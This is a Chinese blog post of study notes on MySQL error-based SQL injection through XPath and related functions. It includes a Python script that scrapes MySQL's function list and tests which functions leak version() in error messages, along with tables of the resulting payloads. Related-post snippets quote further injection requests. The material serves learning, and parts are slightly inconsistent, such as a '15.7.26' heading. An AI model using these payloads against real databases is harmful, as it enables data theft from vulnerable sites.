MYSQL注入之XPATH语法错误报错扩展

最新推荐文章于 2024-04-09 19:36:54 发布
最新推荐文章于 2024-04-09 19:36:54 发布
阅读量756 收藏
点赞数
分类专栏: 学习笔记 文章标签: mysql python 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyynid/article/details/131056496
版权

XPATH语法错误:

  从mysql5.1.5开始提供两个XML查询和修改的函数,extractvalue()和updatexml()。

Extractvalue()负责在xml文档中按照xpath语法查询节点内容updatexml()则负责修改查询到的内容

报错原理:
这两个函数的第二个参数都要求是符合xpath语法的字符串,如果不满足要求就会报错,并且会把查询结果放在报错信息里。

但是对于此类报错来说,其报错函数并不止上述提供的两个,不同的数据库版本有不同的报错函数,本文提供一个自动化脚本,可以自动化的检测各个版本的Xpath报错函数,其原理非常简单,就是通过爬虫爬取mysql官方文档的函数内容,构造报错输入,进行测试,来实现自动化的报错函数检测。

#使用python对网页进行爬取,然后进行数据处理

#对目标进行观察,后发现,函数名有以下特征

#都处于标签scope="row"之下,并且没有被<>包裹,因此可以用xpath进行定位,然后使用正则提取出函数名

#使用python对网页进行爬取,然后进行数据处理

#对目标进行观察,后发现,函数名有以下特征

#都处于标签scope="row"之下,并且没有被<>包裹,因此可以用xpath进行定位,然后使用正则提取出函数名

#使用python对网页进行爬取,然后进行数据处理
#对目标进行观察,后发现,函数名有以下特征
#都处于标签scope="row"之下,并且没有被<>包裹,因此可以用xpath进行定位,然后使用正则提取出函数名
import requests
import pymysql
from lxml import etree
import os
import re
import sys
target='<a class="link" .+><code class="literal">.+[[<em class="replaceable"><code>.+\n</code></em>].*]+'
url="https://dev.mysql.com/doc/refman/5.0/en/built-in-function-reference.html"
header={
    'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'
}
def get_page(url,header):
    target_url=url
    target_header=header
    response=requests.get(url=url,headers=target_header)
    return response
def get_link(page_content,func_list):
    result=etree.HTML(page_content.text)
    element_=result.xpath('//*[@scope="row"]')
    for each in element_:
        data=etree.tostring(each,encoding='utf-8').decode('utf-8')
        #print(data)
        one=re.sub('\<.*?\>','',data)
        func_list.append(one)
    return element_
def connect_to_mysql():
    conn = pymysql.connect(host='localhost',port=3306,user='root',passwd='root', charset = 'utf8' )
    cursor = conn.cursor()
    #cursor.errorhandler
    return cursor
def test_sql(cursor,func_list,error_list):
    #for each in linklist:
    for each in func_list:
        sql=[]
        sql.append('select '+each[0:-2]+'concat(\'~\',version()))')
        sql.append('select '+each[0:-2]+'1,concat(\'~\',version()))')
        sql.append('select '+each[0:-2]+'concat(\'~\',version()),1)')
        sql.append('select '+each[0:-2]+'concat(\'~\',version()),1,1)')
        sql.append('select '+each[0:-2]+'1,1,concat(\'~\',version()),1,1)')
        sql.append('select '+each[0:-2]+'1,concat(\'~\',version()),1)')
        for each in sql:
            #print(each)
            try :
                cursor.execute(each)
            except:
                info=sys.exc_info()
                print( info[0], ":", info[1])  
                if '5.0' in str(info[1]):
                    error_list.append(each+str(info[1]))

if __name__=="__main__":
    func_list=[]
    error_list=[]
    cursor=connect_to_mysql()
    page_content=get_page(url,header)
    link=get_link(page_content,func_list)
    params=["version()","version(),1","1,version()","version(),1,1","1,version(),1","1,1,version()"]
    #print(func_list)
 
    test_sql(cursor,func_list,error_list)
    print(error_list)

以下就是对某几个sql版本进行检测所得到的结果

8.0.12

报错函数  报错语句 报错内容
BIN_TO_UUID select BIN_TO_UUID(concat(\'~\',version())) Incorrect string value: \'~8.0.12\' for function bin_to_uuid
ExtractValue     select ExtractValue(1,concat(\'~\',version()))"XPATH syntax error: \'~8.0.12\'"
GTID_SUBSET  select GTID_SUBSET(concat(\'~\',version()),1)  "Malformed GTID set specification \'~8.0.12\'.")
GTID_SUBTRACT        select GTID_SUBTRACT(concat(\'~\',version()),1)  Malformed GTID set specification \'~8.0.12\'."
ST_LatFromGeoHash    select ST_LatFromGeoHash(concat(\'~\',version())) "Incorrect geohash value: \'~8.0.12\'
ST_LongFromGeoHash    select ST_LongFromGeoHash(concat(\'~\',version())) Incorrect geohash value: \'~8.0.12\' for function ST_LONGFROMGEOHASH"
UpdateXML     select UpdateXML(1,concat(\'~\',version()),1)     "XPATH syntax error: \'~8.0.12\'"
UUID_TO_BIN          select UUID_TO_BIN(concat(\'~\',version())    "Incorrect string value: \'~8.0.12\' for function uuid_to_bin"

15.7.26

报错函数   报错语句 报错内容
ExtractValue   select ExtractValue(1,concat(\'~\',version()))XPATH syntax error: \'~5.7.26\'"
GTID_SUBSET  select GTID_SUBSET(concat(\'~\',version()),1) Malformed GTID set specification \'~5.7.26\'."
GTID_SUBTRACT   select GTID_SUBTRACT(concat(\'~\',version()),1) "Malformed GTID set specification \'~5.7.26\'.")'
ST_LatFromGeoHash select ST_LatFromGeoHash(concat(\'~\',version())) "Incorrect geohash value: \'~5.7.26\'
ST_LongFromGeoHash    select ST_LongFromGeoHash(concat(\'~\',version()))"Incorrect geohash value: \'~5.7.26\' for function ST_LONGFROMGEOHASH
ST_PointFromGeoHash select ST_PointFromGeoHash(concat(\'~\',version()),1)"Incorrect geohash value: \'~5.7.26\' for function st_pointfromgeohash")
UpdateXML  select UpdateXML(1,concat(\'~\',version()),1)  "XPATH syntax error: \'~5.7.26\'")']

 

 

 

辰霖心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 663
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
sql注入-报错注入
课嗨教育的专栏
04-29 781
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 1.什么是报错注入 mysql_error 2.我们在什么情况下使用报错注入 在页面返回连错错误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返回:1' LIMIT 0,1 htt...
Xpath注入攻击及其防御技术研究
weixin_34273046的博客
02-02 504
Xpath注入攻击及其防御技术研究 陆培军 (南通大学 计算机科学与技术学院,江苏 南通226019)     摘 要 XML技术被广泛使用,XML数据的安全性越来越重要。本文简要介绍了XPath注入攻击XML数据的原理。在前人提出的防御通用方法的基础上,提出一个XPath 注入攻击通用检验模型,模型具有普遍意义。     关键词 XPath注入攻击; 防御技术; 模型 ...
sql注入报错注入(精简详细)
qq_56438857的博客
08-02 2079
一直对sql注入报错注入没有系统的整理过,今天整理一遍,方便以后查阅。下面的语句可以直接在sql-lab中实践。
SQL报错注入
weixin_59872639的博客
02-18 931
SQL报错注入概述 通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通 过页面面的错误提示回显出来。 报错注入的前提条件 Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上 后台未对一些具有报错功能的函数(如extractvalue、updatexml等)进行过滤 Xpath类型函数 extractvalue() 作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。 语法: extractvalue( XML_
xpath报错注入
m0_75178803的博客
11-20 239
XML 指可扩展标记语言,是一种很像HTML的标记语言(XML 不是 HTML 的替代),XML 的设计宗旨是传输数据,而不是显示数据。但它仍然没有做任何事情,仅仅是包装在 XML 标签中的纯粹的信息。输入1或者1",页面均回显NO,Wrong username password!输入1' ununionion seselectlect 1,2,3 #输入1' union select 1,2,3 #说明页面过滤了=号,空格,union。xml可以让用户自定义自己的标签。输入1' and 1=2 #
MYSQL updatexml()函数报错注入解析
09-09
XPath语法错误通常表明提供的路径表达式不符合XPath规范,比如预期的节点名、路径分隔符或运算符使用不当。在上述错误中,`:root@localhost`看起来像一个不正确的节点名,这通常不会出现在正常的XPath表达式中。 ...
chrome扩展工具之xpath helper
02-22
chrome浏览器下解析html十分好用的扩展工具,可以方便的检测xpath语法是否正确,在爬虫解析时十分有用
解析XPath语法之在C#中使用XPath的示例详解
09-05
首先,让我们来看看XPath的基本语法: 1. `/` 表示从根节点开始选择。例如,`/pets` 会选择XML文档中的`<pets>`元素。 2. `//` 表示在整个文档中查找,忽略当前节点的位置。例如,`//price` 会选取所有`<price>`...
Xpath语法格式总结
10-19
主要介绍了Xpath语法格式总结的相关内容,比较全面,这里分享给大家,如有不足之处欢迎补充。
C#操作xml之xpath语法
10-29
C#对xml中关于使用xpath语法的介绍
Xpath报错注入(extractvalue和updatexml)
石页
03-25 1278
updatexml() 函数报错注入原理 updatexml() 函数定义 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; updatexml() 函数运行机制 该函数对XPath_string进行查询操作
sql注入漏洞
Enya1122的博客
02-04 1355
SQL注入:是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串中注入SQL指令,在设计的不良程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破化或入侵。代码层面的话,好像是这样的放一张看起来以后有用的图。
sql注入报错注入函数extractvalue和updatexml函数的原理及使用
weixin_46145442的博客
11-28 6574
故意拼接两个函数错误的Xpath字符串,使其报错并返回payload执行结果。
Xpath 报错注入
weixin_73180072的博客
12-04 400
Xpath 报错注入
已解决javax.xml.xpath.XPathExpressionException: XPath表达式异常的正确解决方法,亲测有效!!!
最新发布
小明的Java问道之路
04-09 952
已解决javax.xml.xpath.XPathExpressionException: XPath表达式异常的正确解决方法,亲测有效!!!
python appium 异常捕获处理以及元素定位xpath参数变量
Eayonz的博客
07-24 1458
一、异常捕获处理 1、捕捉异常可以使用try/except语句 try/except语句用来检测try语句块中的错误,从而让except语句捕获异常信息并处理。 如果你不想在异常发生时结束你的程序,只需在try里捕获它。 语法: try: 正常的操作 ...................... except: 发生异常,执行这块代码 ...................... else: 如果没有异常执行这块代码 注意:如代码中需要捕获异常之外执行while循环,那
xpath 爬虫错误求指教
weixin_46613397的博客
06-25 369
标题 xpath 爬虫错误求指教 import parsel #1、获取数据源,headers参数 base_url = "https://www.umei.cc/gaoxiaotupian/" headers = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54'}
from xlml import xpathxpath报错
12-09
根据提供的引用内容,可能是由于您在导入模块时出现了拼写错误。正确的导入语句应该是`from lxml import etree`。然后,您可以使用`etree.XPath`来执行XPath查询。以下是一个简单的示例: ```python from lxml import etree # 创建XML文档 root = etree.Element("root") root.append(etree.Element("child")) root.append(etree.Element("child")) child1 = root[0] child2 = root[1] # 执行XPath查询 result = root.xpath("//child") print(len(result)) # 输出:2 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值